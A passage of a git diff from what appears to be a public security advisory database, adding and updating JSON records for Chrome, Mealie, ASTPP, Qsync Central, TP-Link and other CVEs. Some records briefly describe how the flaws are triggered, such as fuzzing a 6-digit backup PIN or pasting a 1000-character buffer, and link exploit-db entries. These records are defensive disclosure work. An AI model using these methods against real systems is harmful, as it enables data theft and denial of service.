"2026-02-11T21:30:39Z", + "aliases": [ + "CVE-2026-2316" + ], + "details": "Insufficient policy enforcement in Frames in Google Chrome prior to 145.0.7632.45 allowed a remote attacker to perform UI spoofing via a crafted HTML page. (Chromium security severity: Medium)", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2316" + }, + { + "type": "WEB", + "url": "https://chromereleases.googleblog.com/2026/02/stable-channel-update-for-desktop_10.html" + }, + { + "type": "WEB", + "url": "https://issues.chromium.org/issues/422531206" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T19:15:51Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-cp9m-vc98-h8c6/GHSA-cp9m-vc98-h8c6.json b/advisories/unreviewed/2026/02/GHSA-cp9m-vc98-h8c6/GHSA-cp9m-vc98-h8c6.json index f52f38e447f39..f2ff965d1c639 100644 --- a/advisories/unreviewed/2026/02/GHSA-cp9m-vc98-h8c6/GHSA-cp9m-vc98-h8c6.json +++ b/advisories/unreviewed/2026/02/GHSA-cp9m-vc98-h8c6/GHSA-cp9m-vc98-h8c6.json @@ -50,7 +50,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-119" + "CWE-119", + "CWE-120" ], "severity": "HIGH", "github_reviewed": false, diff --git a/advisories/unreviewed/2026/02/GHSA-cx65-rpp3-qf6c/GHSA-cx65-rpp3-qf6c.json b/advisories/unreviewed/2026/02/GHSA-cx65-rpp3-qf6c/GHSA-cx65-rpp3-qf6c.json new file mode 100644 index 0000000000000..f994f85da1e4d --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-cx65-rpp3-qf6c/GHSA-cx65-rpp3-qf6c.json @@ -0,0 +1,37 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-cx65-rpp3-qf6c", + "modified": "2026-02-11T21:30:39Z", + "published": "2026-02-11T21:30:39Z", + "aliases": [ + "CVE-2025-70296" + ], + "details": "A stored HTML injection vulnerability in the Recipe Notes rendering component in Mealie 3.3.1 allows remote authenticated users to inject arbitrary HTML, resulting in user interface redressing within the recipe view.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-70296" + }, + { + "type": "WEB", + "url": "https://github.com/mealie-recipes/mealie/issues/6690" + }, + { + "type": "WEB", + "url": "https://github.com/mealie-recipes/mealie/pull/6743" + }, + { + "type": "WEB", + "url": "https://github.com/chrisWalker11/Cves/blob/main/CVE-2025-70296/CVE-2025-70296.md" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T19:15:50Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-f9c8-6hr7-729r/GHSA-f9c8-6hr7-729r.json b/advisories/unreviewed/2026/02/GHSA-f9c8-6hr7-729r/GHSA-f9c8-6hr7-729r.json new file mode 100644 index 0000000000000..667806ae15d0b --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-f9c8-6hr7-729r/GHSA-f9c8-6hr7-729r.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-f9c8-6hr7-729r", + "modified": "2026-02-11T21:30:40Z", + "published": "2026-02-11T21:30:40Z", + "aliases": [ + "CVE-2020-37104" + ], + "details": "ASTPP 4.0.1 contains an information disclosure vulnerability that allows unauthenticated attackers to download database backup files by predicting backup filename patterns. Attackers can generate a list of 6-digit PIN combinations and fuzz the backup download URL to exfiltrate sensitive database information from the /database_backup/ directory.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-37104" + }, + { + "type": "WEB", + "url": "https://github.com/iNextrix/ASTPP" + }, + { + "type": "WEB", + "url": "https://www.astppbilling.org" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/47900" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/astpp-voip-billing-database-backup-download" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-538" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T21:16:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-fh73-r4jx-8p6f/GHSA-fh73-r4jx-8p6f.json b/advisories/unreviewed/2026/02/GHSA-fh73-r4jx-8p6f/GHSA-fh73-r4jx-8p6f.json index 14449dcea31c1..782667d217ee0 100644 --- a/advisories/unreviewed/2026/02/GHSA-fh73-r4jx-8p6f/GHSA-fh73-r4jx-8p6f.json +++ b/advisories/unreviewed/2026/02/GHSA-fh73-r4jx-8p6f/GHSA-fh73-r4jx-8p6f.json @@ -46,7 +46,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-266" + "CWE-266", + "CWE-639" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2026/02/GHSA-fmmr-xg7j-x2cq/GHSA-fmmr-xg7j-x2cq.json b/advisories/unreviewed/2026/02/GHSA-fmmr-xg7j-x2cq/GHSA-fmmr-xg7j-x2cq.json index 70a64273f9fe8..f121fd873a2db 100644 --- a/advisories/unreviewed/2026/02/GHSA-fmmr-xg7j-x2cq/GHSA-fmmr-xg7j-x2cq.json +++ b/advisories/unreviewed/2026/02/GHSA-fmmr-xg7j-x2cq/GHSA-fmmr-xg7j-x2cq.json @@ -1,13 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-fmmr-xg7j-x2cq", - "modified": "2026-02-11T15:30:24Z", + "modified": "2026-02-11T21:30:38Z", "published": "2026-02-11T15:30:24Z", "aliases": [ "CVE-2025-30266" ], "details": "A NULL pointer dereference vulnerability has been reported to affect Qsync Central. If a remote attacker gains a user account, they can then exploit the vulnerability to launch a denial-of-service (DoS) attack.\n\nWe have already fixed the vulnerability in the following version:\nQsync Central 5.0.0.4 ( 2026/01/20 ) and later", "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" + }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:U/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" diff --git a/advisories/unreviewed/2026/02/GHSA-fqw7-jxvw-p9pw/GHSA-fqw7-jxvw-p9pw.json b/advisories/unreviewed/2026/02/GHSA-fqw7-jxvw-p9pw/GHSA-fqw7-jxvw-p9pw.json index 86fded2ad55e8..e87c765736760 100644 --- a/advisories/unreviewed/2026/02/GHSA-fqw7-jxvw-p9pw/GHSA-fqw7-jxvw-p9pw.json +++ b/advisories/unreviewed/2026/02/GHSA-fqw7-jxvw-p9pw/GHSA-fqw7-jxvw-p9pw.json @@ -1,13 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-fqw7-jxvw-p9pw", - "modified": "2026-02-03T21:31:51Z", + "modified": "2026-02-11T21:30:33Z", "published": "2026-02-03T21:31:51Z", "aliases": [ "CVE-2025-58455" ], "details": "Heap-based Buffer Overflow vulnerability in TP-Link Archer AX53 v1.0 (tmpserver modules) allows authenticated adjacent attackers to cause a segmentation fault or potentially execute arbitrary code via a specially crafted network packet whose length exceeds the maximum expected value.This issue affects Archer AX53 v1.0: through 1.3.1 Build 20241120.", "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:A/AC:H/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" diff --git a/advisories/unreviewed/2026/02/GHSA-frff-9f6h-44cx/GHSA-frff-9f6h-44cx.json b/advisories/unreviewed/2026/02/GHSA-frff-9f6h-44cx/GHSA-frff-9f6h-44cx.json index c95c37e497250..44ea7c128233a 100644 --- a/advisories/unreviewed/2026/02/GHSA-frff-9f6h-44cx/GHSA-frff-9f6h-44cx.json +++ b/advisories/unreviewed/2026/02/GHSA-frff-9f6h-44cx/GHSA-frff-9f6h-44cx.json @@ -1,13 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-frff-9f6h-44cx", - "modified": "2026-02-11T15:30:24Z", + "modified": "2026-02-11T21:30:38Z", "published": "2026-02-11T15:30:24Z", "aliases": [ "CVE-2025-30269" ], "details": "A use of externally-controlled format string vulnerability has been reported to affect Qsync Central. If a remote attacker gains a user account, they can then exploit the vulnerability to obtain secret data or modify memory.\n\nWe have already fixed the vulnerability in the following version:\nQsync Central 5.0.0.4 ( 2026/01/20 ) and later", "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N" + }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:U/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" diff --git a/advisories/unreviewed/2026/02/GHSA-g587-3qp8-6jq6/GHSA-g587-3qp8-6jq6.json b/advisories/unreviewed/2026/02/GHSA-g587-3qp8-6jq6/GHSA-g587-3qp8-6jq6.json new file mode 100644 index 0000000000000..596123517af49 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-g587-3qp8-6jq6/GHSA-g587-3qp8-6jq6.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-g587-3qp8-6jq6", + "modified": "2026-02-11T21:30:42Z", + "published": "2026-02-11T21:30:42Z", + "aliases": [ + "CVE-2020-37211" + ], + "details": "SpotIM 2.2 contains a denial of service vulnerability that allows attackers to crash the application by inputting a large buffer in the registration name field. Attackers can generate a 1000-character payload and paste it into the 'Name' field to trigger an application crash.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-37211" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/47870" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/spotim-name-denial-of-service" + }, + { + "type": "WEB", + "url": "http://www.nsauditor.com" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-120" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T21:16:16Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-g74q-8phg-6q8x/GHSA-g74q-8phg-6q8x.json b/advisories/unreviewed/2026/02/GHSA-g74q-8phg-6q8x/GHSA-g74q-8phg-6q8x.json index 80bf9889cc0f2..44a986a4a4106 100644 --- a/advisories/unreviewed/2026/02/GHSA-g74q-8phg-6q8x/GHSA-g74q-8phg-6q8x.json +++ b/advisories/unreviewed/2026/02/GHSA-g74q-8phg-6q8x/GHSA-g74q-8phg-6q8x.json @@ -46,7 +46,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-77" + "CWE-77", + "CWE-78" ], "severity": "HIGH", "github_reviewed": false, diff --git a/advisories/unreviewed/2026/02/GHSA-g7hj-9w6f-45m2/GHSA-g7hj-9w6f-45m2.json b/advisories/unreviewed/2026/02/GHSA-g7hj-9w6f-45m2/GHSA-g7hj-9w6f-45m2.json index 7fd84247d26e0..d450ef92a5514 100644 --- a/advisories/unreviewed/2026/02/GHSA-g7hj-9w6f-45m2/GHSA-g7hj-9w6f-45m2.json +++ b/advisories/unreviewed/2026/02/GHSA-g7hj-9w6f-45m2/GHSA-g7hj-9w6f-45m2.json @@ -1,13 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-g7hj-9w6f-45m2", - "modified": "2026-02-11T15:30:25Z", + "modified": "2026-02-11T21:30:38Z", "published": "2026-02-11T15:30:25Z", "aliases": [ "CVE-2025-47209" ], "details": "A NULL pointer dereference vulnerability has been reported to affect Qsync Central. If a remote attacker gains a user account, they can then exploit the vulnerability to launch a denial-of-service (DoS) attack.\n\nWe have already fixed the vulnerability in the following version:\nQsync Central 5.0.0.4 ( 2026/01/20 ) and later", "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" + }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:U/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" diff --git a/advisories/unreviewed/2026/02/GHSA-gcwg-27rq-5w54/GHSA-gcwg-27rq-5w54.json b/advisories/unreviewed/2026/02/GHSA-gcwg-27rq-5w54/GHSA-gcwg-27rq-5w54.json new file mode 100644 index 0000000000000..025379db9fb9e --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-gcwg-27rq-5w54/GHSA-gcwg-27rq-5w54.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-gcwg-27rq-5w54", + "modified": "2026-02-11T21:30:41Z", + "published": "2026-02-11T21:30:41Z", + "aliases": [ + "CVE-2020-37199" + ], + "details": "NBMonitor 1.6.6.0 contains a denial of service vulnerability in its registration key input that allows attackers to crash the application. Attackers can generate a 1000-character buffer payload and paste it into the 'Key' field to trigger an application crash.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-37199" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/47866" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/nbmonitor-key-denial-of-service" + }, + { + "type": "WEB", + "url": "http://www.nsauditor.com" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-120" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T21:16:14Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-gfgw-92mr-c3gr/GHSA-gfgw-92mr-c3gr.json b/advisories/unreviewed/2026/02/GHSA-gfgw-92mr-c3gr/GHSA-gfgw-92mr-c3gr.json index 12034b4f2b7f7..c1004cfd27d1f 100644 --- a/advisories/unreviewed/2026/02/GHSA-gfgw-92mr-c3gr/GHSA-gfgw-92mr-c3gr.json +++ b/advisories/unreviewed/2026/02/GHSA-gfgw-92mr-c3gr/GHSA-gfgw-92mr-c3gr.json @@ -50,7 +50,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-77" + "CWE-77", + "CWE-78" ], "severity": "HIGH", "github_reviewed": false, diff --git a/advisories/unreviewed/2026/02/GHSA-gfr2-w843-rf3v/GHSA-gfr2-w843-rf3v.json b/advisories/unreviewed/2026/02/GHSA-gfr2-w843-rf3v/GHSA-gfr2-w843-rf3v.json index 52ea11d857c55..d312b0518f17a 100644 --- a/advisories/unreviewed/2026/02/GHSA-gfr2-w843-rf3v/GHSA-gfr2-w843-rf3v.json +++ b/advisories/unreviewed/2026/02/GHSA-gfr2-w843-rf3v/GHSA-gfr2-w843-rf3v.json @@ -50,7 +50,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-74" + "CWE-74", + "CWE-77" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2026/02/GHSA-gg4v-3p7w-7vc6/GHSA-gg4v-3p7w-7vc6.json b/advisories/unreviewed/2026/02/GHSA-gg4v-3p7w-7vc6/GHSA-gg4v-3p7w-7vc6.json new file mode 100644 index 0000000000000..bc449035ee8b3 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-gg4v-3p7w-7vc6/GHSA-gg4v-3p7w-7vc6.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-gg4v-3p7w-7vc6", + "modified": "2026-02-11T21:30:41Z", + "published": "2026-02-11T21:30:41Z", + "aliases": [ + "CVE-2020-37197" + ], + "details": "Dnss Domain Name Search Software contains a denial of service vulnerability that allows attackers to crash the application by overflowing the 'Name' input field. Attackers can generate a 1000-character buffer payload and paste it into the registration name field to trigger an application crash.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-37197" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/47861" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/dnss-domain-name-search-software-name-denial-of-service" + }, + { + "type": "WEB", + "url": "http://www.nsauditor.com" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-120" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T21:16:14Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-gvjm-pmwp-75mw/GHSA-gvjm-pmwp-75mw.json b/advisories/unreviewed/2026/02/GHSA-gvjm-pmwp-75mw/GHSA-gvjm-pmwp-75mw.json new file mode 100644 index 0000000000000..9effa6d88e9f8 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-gvjm-pmwp-75mw/GHSA-gvjm-pmwp-75mw.json @@ -0,0 +1,33 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-gvjm-pmwp-75mw", + "modified": "2026-02-11T21:30:40Z", + "published": "2026-02-11T21:30:40Z", + "aliases": [ + "CVE-2026-2317" + ], + "details": "Inappropriate implementation in Animation in Google Chrome prior to 145.0.7632.45 allowed a remote attacker to leak cross-origin data via a crafted HTML page. (Chromium security severity: Medium)", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2317" + }, + { + "type": "WEB", + "url": "https://chromereleases.googleblog.com/2026/02/stable-channel-update-for-desktop_10.html" + }, + { + "type": "WEB", + "url": "https://issues.chromium.org/issues/464173573" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T19:15:51Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-h5fh-q8gg-2c8w/GHSA-h5fh-q8gg-2c8w.json b/advisories/unreviewed/2026/02/GHSA-h5fh-q8gg-2c8w/GHSA-h5fh-q8gg-2c8w.json index 485888113dcf4..dab32fd6cb104 100644 --- a/advisories/unreviewed/2026/02/GHSA-h5fh-q8gg-2c8w/GHSA-h5fh-q8gg-2c8w.json +++ b/advisories/unreviewed/2026/02/GHSA-h5fh-q8gg-2c8w/GHSA-h5fh-q8gg-2c8w.json @@ -46,7 +46,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-74" + "CWE-74", + "CWE-77" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2026/02/GHSA-h6v2-x2pp-qx2r/GHSA-h6v2-x2pp-qx2r.json b/advisories/unreviewed/2026/02/GHSA-h6v2-x2pp-qx2r/GHSA-h6v2-x2pp-qx2r.json new file mode 100644 index 0000000000000..1c96d96da683c --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-h6v2-x2pp-qx2r/GHSA-h6v2-x2pp-qx2r.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-h6v2-x2pp-qx2r", + "modified": "2026-02-11T21:30:41Z", + "published": "2026-02-11T21:30:41Z", + "aliases": [ + "CVE-2020-37195" + ], + "details": "BlueAuditor 1.7.2.0 contains a denial of service vulnerability in the registration name input field that allows attackers to crash the application. Attackers can generate a 1000-character buffer payload and paste it into the 'Name' field to trigger an application crash.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-37195" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/47857" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/blueauditor-name-denial-of-service" + }, + { + "type": "WEB", + "url": "http://www.nsauditor.com" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-120" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T21:16:13Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-h9c8-jr46-gp7p/GHSA-h9c8-jr46-gp7p.json b/advisories/unreviewed/2026/02/GHSA-h9c8-jr46-gp7p/GHSA-h9c8-jr46-gp7p.json new file mode 100644 index 0000000000000..7ae5f78f42d00 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-h9c8-jr46-gp7p/GHSA-h9c8-jr46-gp7p.json @@ -0,0 +1,33 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-h9c8-jr46-gp7p", + "modified": "2026-02-11T21:30:42Z", + "published": "2026-02-11T21:30:42Z", + "aliases": [ + "CVE-2024-50620" + ], + "details": "Unrestricted Upload of File with Dangerous Type vulnerabilities exist in the rich text editor and document manage components in CIPPlanner CIPAce before 9.17. An authorized user can upload executable files when inserting images in the rich text editor, and upload executable files when uploading files on the document management page. Those executables can be executed if they are not stored in a shared directory or if the storage directory has executed permissions.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-50620" + }, + { + "type": "WEB", + "url": "https://cipplanner.com/cve-2024-50620-cve-public-notification-of-resolution" + }, + { + "type": "WEB", + "url": "https://www.facebook.com/people/CIPPlanner-Corporation/100082985059905" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T21:16:17Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-hgh5-fxqq-8cf2/GHSA-hgh5-fxqq-8cf2.json b/advisories/unreviewed/2026/02/GHSA-hgh5-fxqq-8cf2/GHSA-hgh5-fxqq-8cf2.json index f18dc8c815e2e..a480ef36af146 100644 --- a/advisories/unreviewed/2026/02/GHSA-hgh5-fxqq-8cf2/GHSA-hgh5-fxqq-8cf2.json +++ b/advisories/unreviewed/2026/02/GHSA-hgh5-fxqq-8cf2/GHSA-hgh5-fxqq-8cf2.json @@ -46,7 +46,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-74" + "CWE-74", + "CWE-89" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2026/02/GHSA-hpj8-5pv7-f58m/GHSA-hpj8-5pv7-f58m.json b/advisories/unreviewed/2026/02/GHSA-hpj8-5pv7-f58m/GHSA-hpj8-5pv7-f58m.json new file mode 100644 index 0000000000000..2031bb8024ac1 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-hpj8-5pv7-f58m/GHSA-hpj8-5pv7-f58m.json @@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-hpj8-5pv7-f58m", + "modified": "2026-02-11T21:30:40Z", + "published": "2026-02-11T21:30:40Z", + "aliases": [ + "CVE-2026-2321" + ], + "details": "Use after free in Ozone in Google Chrome prior to 145.0.7632.45 allowed a remote attacker who convinced a user to engage in specific UI gestures to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: Medium)", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2321" + }, + { + "type": "WEB", + "url": "https://chromereleases.googleblog.com/2026/02/stable-channel-update-for-desktop_10.html" + }, + { + "type": "WEB", + "url": "https://issues.chromium.org/issues/461877477" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-416" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T19:15:52Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-hwwj-gxrj-23x7/GHSA-hwwj-gxrj-23x7.json b/advisories/unreviewed/2026/02/GHSA-hwwj-gxrj-23x7/GHSA-hwwj-gxrj-23x7.json new file mode 100644 index 0000000000000..5eeb145785d94 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-hwwj-gxrj-23x7/GHSA-hwwj-gxrj-23x7.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-hwwj-gxrj-23x7", + "modified": "2026-02-11T21:30:41Z", + "published": "2026-02-11T21:30:41Z", + "aliases": [ + "CVE-2020-37193" + ], + "details": "ZIP Password Recovery 2.30 contains a denial of service vulnerability that allows attackers to crash the application by providing maliciously crafted input. Attackers can create a specially prepared text file with specific characters to trigger an application crash when selecting a ZIP file.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-37193" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/47894" + }, + { + "type": "WEB", + "url": "https://www.top-password.com/purchase.html" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/zip-password-recovery-zip-file-denial-of-service" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-120" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T21:16:13Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-hx6f-whrw-7w7f/GHSA-hx6f-whrw-7w7f.json b/advisories/unreviewed/2026/02/GHSA-hx6f-whrw-7w7f/GHSA-hx6f-whrw-7w7f.json index 4a2fc9556f143..84b7557ed4166 100644 --- a/advisories/unreviewed/2026/02/GHSA-hx6f-whrw-7w7f/GHSA-hx6f-whrw-7w7f.json +++ b/advisories/unreviewed/2026/02/GHSA-hx6f-whrw-7w7f/GHSA-hx6f-whrw-7w7f.json @@ -1,13 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-hx6f-whrw-7w7f", - 